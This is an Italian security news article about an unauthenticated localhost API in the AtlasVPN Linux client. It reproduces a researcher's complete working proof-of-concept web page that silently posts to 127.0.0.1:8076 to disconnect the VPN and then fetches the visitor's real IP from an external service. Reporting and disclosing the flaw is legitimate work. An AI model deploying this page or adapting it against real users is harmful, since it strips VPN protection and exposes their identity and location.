Pochi giorni fa sul sito Reddit è apparsa la notizia della scoperta di una grave vulnerabilità di sicurezza nel client AtlasVPN per il sistema operativo Linux.
Un ricercatore di sicurezza informatica che ha voluto rimanere anonimo ha pubblicato un exploit PoC funzionante e ha dimostrato al pubblico come gli aggressori possono ottenere l’accesso al vero indirizzo IP di qualsiasi utente della versione Linux del client VPN menzionato sopra.
“AtlasVPN non prende sul serio la sicurezza dei suoi utenti. Le loro soluzioni di sicurezza software fanno così schifo che è difficile credere che si tratti di un bug e non di una backdoor. Nessuno può essere così incompetente”, uno specialista anonimo ha criticato l’approccio dell’azienda.
 Christmas Sale -40% 𝗖𝗵𝗿𝗶𝘀𝘁𝗺𝗮𝘀 𝗦𝗮𝗹𝗲! Sconto del 𝟰𝟬% 𝘀𝘂𝗹 𝗽𝗿𝗲𝘇𝘇𝗼 𝗱𝗶 𝗰𝗼𝗽𝗲𝗿𝘁𝗶𝗻𝗮 del Corso "Dark Web & Cyber Threat Intelligence" in modalità E-Learning sulla nostra Academy!🚀
Fino al 𝟯𝟭 𝗱𝗶 𝗗𝗶𝗰𝗲𝗺𝗯𝗿𝗲, prezzi pazzi alla Red Hot Cyber Academy. 𝗧𝘂𝘁𝘁𝗶 𝗶 𝗰𝗼𝗿𝘀𝗶 𝘀𝗰𝗼𝗻𝘁𝗮𝘁𝗶 𝗱𝗲𝗹 𝟰𝟬% 𝘀𝘂𝗹 𝗽𝗿𝗲𝘇𝘇𝗼 𝗱𝗶 𝗰𝗼𝗽𝗲𝗿𝘁𝗶𝗻𝗮.
Per beneficiare della promo sconto Christmas Sale, scrivici ad [email protected] o contattaci su Whatsapp al numero di telefono: 379 163 8765.
Se ti piacciono le novità e gli articoli riportati su di Red Hot Cyber, iscriviti immediatamente alla newsletter settimanale per non perdere nessun articolo. La newsletter generalmente viene inviata ai nostri lettori ad inizio settimana, indicativamente di lunedì. |
<html>
<head>
<title>=[ atlasvpnd 1.0.3 remote disconnect exploit ]=</title>
</head>
<body>
<pre><code id="log">=[ atlasvpnd 1.0.3 remote disconnect exploit ]=
You should be running the atlasvpn linux client and be connected to a VPN.
Use <b>atlasvpn connect</b> to connect to a VPN server.
</code></pre>
<iframe id="hiddenFrame" name="hiddenFrame" style="display: none;"></iframe>
<form id="stopForm" action="http://127.0.0.1:8076/connection/stop" method="post" target="hiddenFrame">
<button type="submit" style="display: none"></button>
</form>
<script>
window._currentIP = false;
// Run main exploit code
window.addEventListener('load', function () {
addIPToLog();
setTimeout(triggerFormSubmission, 1000);
setTimeout(addIPToLog, 3000);
});
// Blind CORS request to atlasvpnd to disconnect the VPN
function triggerFormSubmission() {
var logDiv = document.getElementById('log');
logDiv.innerHTML += "[-] Sending disconnect request to atlasvpnd...\n";
document.getElementById('stopForm').submit();
}
// Gets IP from ipfy API (this, of course, could be your server)
function addIPToLog() {
var logDiv = document.getElementById('log');
var xhr = new XMLHttpRequest();
xhr.open('GET', 'https://api.ipify.org?format=json', true);
xhr.onload = function () {
var ipAddress = window._currentIP;
if (xhr.status === 200) {
var response = JSON.parse(xhr.responseText);
ipAddress = response.ip;
logDiv.innerHTML += '[?] Current IP:' + ipAddress + "\n";
} else {
logDiv.innerHTML += '[-] Error fetching IP address.\n';
}
// Check if the IP changed. If yes: Success.
if (window._currentIP && window._currentIP != ipAddress) {
logDiv.innerHTML += "[+] Successfully disconnected VPN."
}
if (window._currentIP && window._currentIP == ipAddress) {
logDiv.innerHTML += "[-] Disconnect failed our you were not connected to the VPN in the first place."
}
// Save IP for next iteration.
window._currentIP = ipAddress;
};
xhr.send();
}
</script>
</body>
</html>
Secondo il ricercatore la vulnerabilità è dovuta a una serie di gravi errori nell’architettura dell’applicazione. Nello specifico, il client AtlasVPN apre l’API su localhost sulla porta 8076, che non ha assolutamente alcun tipo di autenticazione.
Sulla base di ciò, qualsiasi programma in esecuzione sul computer, incluso un browser Web, può avere pieno accesso a questa porta. Ciò significa che qualsiasi sito web con il contenuto appropriato può inviare una richiesta su questa porta e disabilitare banalmente la VPN, rivelando quindi il reale indirizzo IP dell’utente .
L’esperto ha provato a contattare il supporto AtlasVPN per segnalare la vulnerabilità, ma non ha ricevuto risposta. A suo avviso, ciò indica un atteggiamento negligente dell’azienda nei confronti della sicurezza dei propri clienti.
Al momento della pubblicazione di questa notizia, i rappresentanti di AtlasVPN non hanno commentato la situazione.
Si consiglia a tutti gli utenti del client sotto Linux di prestare attenzione quando visitano siti non verificati o addirittura di modificare temporaneamente il client VPN finché la vulnerabilità non verrà risolta.
Seguici su Google News, LinkedIn, Facebook e Instagram per ricevere aggiornamenti quotidiani sulla sicurezza informatica. Scrivici se desideri segnalarci notizie, approfondimenti o contributi da pubblicare.
